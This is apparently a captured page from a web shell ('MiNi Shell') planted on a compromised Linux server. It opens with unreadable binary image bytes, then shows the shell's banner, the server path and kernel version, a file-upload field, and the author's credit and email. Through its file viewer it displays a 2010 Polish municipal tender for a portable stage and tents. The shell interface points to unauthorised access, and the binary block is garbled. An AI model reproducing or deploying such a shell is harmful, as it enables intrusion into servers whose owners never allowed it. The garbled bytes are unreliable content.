JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100812/217675-N-2010.html

<p class="kh_header"><b>Kazimierz Dolny: Dostawa estrady przenośnej i namiotów w celu profesjonalnej organizacji wydarzeń kulturalnych w ramach projektu Rewaloryzacja i zagospodarowanie Zespołu Zamkowego w Kazimierzu Dolnym</b><br>
<b>Numer ogłoszenia: 217675 - 2010; data zamieszczenia: 12.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kazimierz Dolny , ul. Senatorska 5, 24-120 Kazimierz Dolny, woj. lubelskie, tel. 0818810212 w. 28, faks 081 8810213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kazimierzdolny.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa estrady przenośnej i namiotów w celu profesjonalnej organizacji wydarzeń kulturalnych w ramach projektu Rewaloryzacja i zagospodarowanie Zespołu Zamkowego w Kazimierzu Dolnym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część nr 1: Estrada przenośna:
Zakup i dostawa kompletnej, trwałej estrady składanej o konstrukcji aluminiowej z zadaszeniem, przeznaczonej do wielokrotnego montażu wewnatrz i na zewnątrz przy zróżnicowanym terenie (wysokość jak i nawierzchnia np. trawiasta), o następujących parametrach:

a) scena - o wymiarach około 10,00m x 8,00m, wysokość 0,70m - 1,20m; 
- wykonana z modułowych podestów scenicznych o wymiarach 2,00m x 1,00m i wytrzymałości min. 500kg/m2,
- podesty o konstrukcji aluminiowej, pokryte powierzchnią antypoślizgową z płyty wodoodpornej OSB lub sklejki wodoodpornej o grubości min.18mm, atestowane; 
- podesty sceniczne z systemem łączenia zapewniającym trwałość i stabilność konstrukcji;
- nogi teleskopowe o płynnej regulacji umożliwiające bezpieczne umiejscowienie podestu nie tylko w pomieszczeniach zamkniętych, na terenie płaskim, ale też w terenie na nierównych gruntach, gdzie konieczne są różne wysokości nóg w celu wypoziomowania podestu, wysokośc wymagana 0,70m x 1,20m; 
- barierki ochronne (z trzech stron sceny) spełniające wymogi przepisów budowlanych i bezpieczeństwa, montowane w łatwy sposób do sceny; 
- schody 2 komplety o wysokości regulowanej w tym samym zakresie co wysokość sceny z podestem wodoodpornym o powierzchni antypoślizgowej, mocowanie schodów do ramy sceny, w komplecie należy dostarczyć także poręcze do schodów o regulowanej długości oraz niezbędne uchwyty;
- certyfikaty (deklaracja zgodności) jakości i bezpieczeństwa, dopuszczajacy do użytkowania we wszystkich krajach Unii Europejskiej;
- w komplecie muszą się znajdować wszystkie niezbędne elementy połączeniowe zapewniające stabilność sceny oraz narzędzia służące do montażu.
- bariery zabezpieczające - minimum 20mb

b) zadaszenie - osłaniajęce scenę o wymiarach dostosowanych do wymiarów sceny. 
Wymagania techniczne:
- wysokość konstrukcji max. 6m;
- konstrukcja zadaszenia wykonana z kratownic aluminiowych;
- kopuła zadaszenia uzupełniona dźwigarami i kształtownikami aluminiowymi podpierającymi plandekę;
- plandeka powinna być podparta (podparcia zapobiegajace gromadzeniu się dużej ilosci wody);
- oplandekowanie dachu musi być wodoszczelne, wykonane z grubego materiału PCV w jednolitym jasnym kolorze, np. biały lub ecru, posiadajace wymagane atesty (trudno zapalności oraz ciężar właściwy około 650 g/m2);
- w komplecie zadaszenia muszą się znajdować osłony ścian bocznych i tylnej oraz podestu sceny z 4 stron, wykonane z siatki plandekowej w kolorze czarnym;
- słupy powinny zawierać elementy umozliwiajace montaż oraz być posadowione na podstawach wyposażonych w koła i podpory regulowane;
- słupy nośne zadaszenia powinny być usytuowane na zewnatrz (z boków) ramy nośnej i nie wchodzić w światło sceny;
- łączenie odcinków konstrukcji powinno odbywać się za pomocą tzw. szybkozłączy umożliwiających łatwy i szybki montaż oraz dużą wytrzymałość;
- żaden element zadaszenia nie powinien być dłuższy niż 3m;
- w komplecie muszą się znajdować wszystkie elementy połączeniowe, napinacze, odciągi wraz z elementami mocującymi w twardym i miękkim podłożu, nosidła do plandek i osłon, narzędzia montażowe itp.
c)	wymagania dodatkowe:
- scena z zadaszeniem łatwa w przewożeniu i transporcie, długość elementów maks. 3,00m, wymagane są również nosidła do pokrycia i osłon;
- skrzynka narzędziowa wyposażona w zapasowe elementy mocujące oraz komplet narzędzi do montażu, dołaczona pełna instrukcja obsługi;
- gwarancja i serwis: okres gwarancji min. 36 miesięcy, czas reakcji serwisowej maks. 3 dni;
- aprobaty techniczne, atesty oraz zgodność z przepisami prawa;
- dostawa estrady obejmuje: transport na miejsce wskazane przez Zamawiającego, pokazowy montaż i demontaż połączony ze szkoleniem obsługi.

Część nr 2: Namioty:
Zakup i dostawa fabrycznie nowych namiotów typu handlowego w następującej ilości:
1.	Namiot o wymiarach 5,00m x 5,00m - 2 szt.
2.	Namiot o wymiarach 3,00m x 3,00m - 4 szt.
a) konstrukcja namiotu
- konstrukcja namiotu musi być wykonana z profilu aluminiowego o przekroju: nogi namiotu co najmniej 45mm - 50mm, szable konstrukcji dachu co najmniej 25mm i grubości scianki profili co najmniej 2mm
- konstrukcja dachu powinna być wykonana z szabli aluminiowych owalnych ze wzmocnieniem w postaci poprzeczki aluminiowej pozwalającej na ekspresowe rozłożenie namiotu; 
- noga namiotu teleskopowa z systemem regulacji wysokości;
- każda noga musi być zakończona stabilną stopą aluminiową, której minimum jeden bok musi mieć wymiar co najmniej 10cm z otworami na szpilki kotwowe; stopa musi umożliwiać bezpieczne umiejscowienie namiotu na twardych i nierównych gruntach, gdzie konieczne są różne wysokości dla kazdej z nóg; namiot musi być stabilny na każdym podłożu;
- dodatkowo namiot musi być wyposażony w system linek, kołków i szpilek umożliwiających mocowanie do różnego podłoża;
- konstrukcja namiotu powinna być lekka, umożliwiać samodzielny i szybki montaż;
b) poszycie dachu oraz ścian bocznych
- tkanina na poszycie dachu oraz ścian bocznych musi być wykonana z materiału wytrzymałego na zmienne temperatury od - 35 stopni do + 35 stopni Celsjusza; tkanina 	musi być nieprzemakalna, trudnopalna, odporna na promieniowanie UV, starzenie się, wytrzymała na rozciąganie i rozdzieranie, o gramaturze min. 300g/m2
- technologia napinania poszycia musi zapewniać stałe napięcie powłok, co powinno zapewnić brak widocznych zafałdowań i wyeliminowanie efektu trzepotania poszycia;
- ściany namiotu muszą być mocowane do poszycia dachowego za pomocą zapinania na rzep na całej długości, muszą zapewniać szczelność namiotu;
- poszycie dachu powinno posiadać dodatkowe wzmocnienia na narożnikach oraz mocujące obręcza;
c) kolor i grafika namiotu
- każdy namiot powinien być koloru jasnego, np. ecru lub beż;
- na poszyciu dachu z przodu namiotu w widocznym miejscu należy umieścić herb miasta Kazimierz Dolny oraz nazwa Gmina Kazimierz Dolny; ponadto z przodu na ścianie frontowej górnej należy umieścić zestaw znaków 	graficznych: logo Narodowej Strategii Spójności z dopiskiem PROGRAM REGIONALNY NARODOWA STRATEGIA SPÓJNOŚCI, herb Województwa Lubelskiego z dopiskiem WOJEWÓDZTWO LUBELSKIE, emblemat Uni Europejskiej z dopiskiem UNIA EUROPEJSKA EUROPEJSKI FUNDUSZ ROZWOJU REGIONALNEGO, hasło promocyjne zgodnie z Wytycznymi dla Beneficjentów w zakresie informacji i promocji w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013, projekt graficzny namiotu musi być uzgodniony z Zamawiającym
d) dodatkowe wyposażenie namiotu
- ścianę od frontu z systemem zapinania na rzep na całej długości ściany z dodatkowymi obręczami mocującymi;
- trzy ściany pełne mocowane taśmą na rzepy na całej długości; w jednej ze ścian bocznych należy umieścić drzwi; drzwi powinny być otwierane na zamek błyskawiczny od wewnątrz i od zewnątrz oraz powinny być zwijane i zapinane za pomocą taśm na rzep.
- system umożliwiający połączenie wszystkich namiotów w jeden moduł; system powinien posiadać zaciski łaczeniowe do namiotów, rynny deszczowe oraz łączniki środkowe dla ścian bocznych, które pozwolą zamknąć wolną przestrzeń pomiędzy dwoma namiotami i inne łaczniki które ustabilizują namioty; wszystkie namioty powinny łączyć się ze sobą tworząc jeden moduł;
- pokrowiec ochronny;
- obciążniki do namiotu w ilości 4 szt. o ciężarze 15 kg każdy;
e) wymagania dodatkowe
- dostawa obejmuje transport na miejsce wskazane przez Zamawiającego, pokazowy montaż i demontaż połączony ze szkoleniem obsługi;
- okres gwarancji co najmniej 36 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.52.25.30-1, 44.21.11.00-3, 44.21.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w niniejszym postępowaniu nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający dokona oceny spełniania ww warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - zgodnego w treści ze wzorem stanowiącym Załącznik nr 2 do oferty, z zastrzeżeniem, że w przypadku składania ofert przez Wykonawców występujących wspólnie, ww. oświadczenie muszą złożyć łącznie Wykonawcy występujący wspólnie. 
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów  i oświadczeń załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający dokona oceny spełniania ww warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - zgodnego w treści ze wzorem stanowiącym Załącznik nr 2 do oferty, z zastrzeżeniem, że w przypadku składania ofert przez Wykonawców występujących wspólnie, ww. oświadczenie muszą złożyć łącznie Wykonawcy występujący wspólnie. 
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów  i oświadczeń załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający dokona oceny spełniania ww warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - zgodnego w treści ze wzorem stanowiącym Załącznik nr 2 do oferty, z zastrzeżeniem, że w przypadku składania ofert przez Wykonawców występujących wspólnie, ww. oświadczenie muszą złożyć łącznie Wykonawcy występujący wspólnie. 
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów  i oświadczeń załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający dokona oceny spełniania ww warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - zgodnego w treści ze wzorem stanowiącym Załącznik nr 2 do oferty, z zastrzeżeniem, że w przypadku składania ofert przez Wykonawców występujących wspólnie, ww. oświadczenie muszą złożyć łącznie Wykonawcy występujący wspólnie. 
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów  i oświadczeń załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. 
Opis sposobu dokonywania oceny spełniania tego warunku: 
Zamawiający dokona oceny spełniania ww warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - zgodnego w treści ze wzorem stanowiącym Załącznik nr 2 do oferty, z zastrzeżeniem, że w przypadku składania ofert przez Wykonawców występujących wspólnie, ww. oświadczenie muszą złożyć łącznie Wykonawcy występujący wspólnie. 
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów  i oświadczeń załączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony druk Oferta - zgodny w treści ze wzorem stanowiącym Załącznik nr 1 do oferty,
2)	Pełnomocnictwo do popisania oferty (jeżeli dotyczy). 
3)	Zakres (części) przedmiotu zamówienia, który Wykonawca zamierza powierzyć do wykonania podwykonawcom, zgodny w treści ze wzorem stanowiącym Załącznik nr 4 	do oferty. W przypadku realizacji zamówienia bez udziału podwykonawców, na przedmiotowym załączniku należy złoży oświadczenia o treści: zamówienie zostanie zrealizowane bez udziału podwykonawców.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne postanowienia umowy zawarte zostały w dodatku nr 4 do s.i.w.z. - wzór ogólnych warunków umowy .
Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. W przypadku wystapienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
I. Zmiana terminu przewidzianego na zakończenie robót:
1) przyczyny zewnętrzne niezależne od Zamawiającego oraz Dostawcy skutkujące niemożliwością wykonywania czynności przewidzianych Kontraktem, w tym brak materiałów do wytworzenia produktu dostawy u producenta.
W przypadku wystąpienia tej okoliczności termin przewidziany na wykonanie umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
II. Zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych w szczególności następującymi okolicznościami:
1) konieczność zrealizowania dostawy przy zastosowaniu innych rozwiązań technicznych/technologicznych do wytworzenia produktu wskazanego w s.i.w.z., w sytuacji, gdyby przewidziane parametry techniczne produktów dostawy, groziłyby niewykonaniem (wycofanie produktu z rynku przez producenta) lub wadliwym wykonaniem przedmiotu umowy,
2) konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych niż wskazane w s.i.w.z., ze względu na zmiany parametrów technicznych oraz wyglądu produktów przez producentów.
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt II możliwa jest w szczególności zmiana produktów dostawy - na produkty spełniające takie same funkcje i parametry techniczne nie gorsze niż opisane w przedmiocie zamówienia.
III. Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
1) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z s.i.w.z.;
2) zmiana obowiązującej stawki VAT;
3) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
4) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy;
5) zmiany uzasadnione okolicznościami, o których mowa w art. 3571 §1 Kodeksu cywilnego; (tzw. rażąca strata)
6) gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ.
W przypadku określonym w pkt 2, zmiana stawki VAT dotyczyć będzie ceny kontraktowej, w części, jakiej dotyczą te zmiany przepisów. 
W przypadku pkt 3, zmiany dostosują sposób rozliczeń lub płatności do wymogów zmienionej umowy o dofinansowanie projektu lub nowych wytycznych dotyczących realizacji projektu.
W przypadku pkt 4, zmiany mogą dotyczyć zakresu zamówienia i zmniejszenia wynagrodzenia o kwoty odpowiadające cenie dostaw, z których Zamawiający rezygnuje.
W przypadku pkt 6, (okoliczność techniczna) zmiany mogą dotyczyć parametrów technicznych materiałów do wytworzenia produktów. 
Zmiana wynagrodzenia Wykonawcy jest możliwa w przypadkach wskazanych wyżej, na zasadach określonych w warunkach umowy.
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
1) zmiany danych teleadresowych,
2) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego);
Strona, która występuje z propozycją zmiany umowy, w oparciu o przedstawiony powyżej katalog zmian umowy zobowiązana jest do sporządzenia  i uzasadnienia wniosku o taką zmianę. Wszelkie zmiany umowy dla swej ważności wymagają formy pisemnej w postaci aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kazimierzdolny.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta ul. Senatorska 5, 24-120 Kazimierz Dolny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2010 godzina 10:00, miejsce: Urząd Miasta ul. Senatorska 5, 24-120 Kazimierz Dolny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny Województwa Lubelskiego na lata 2007-2013, oś priorytetowa VII: Kultura, tyrystyka i współpraca międzyregionalna działanie 7.1.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com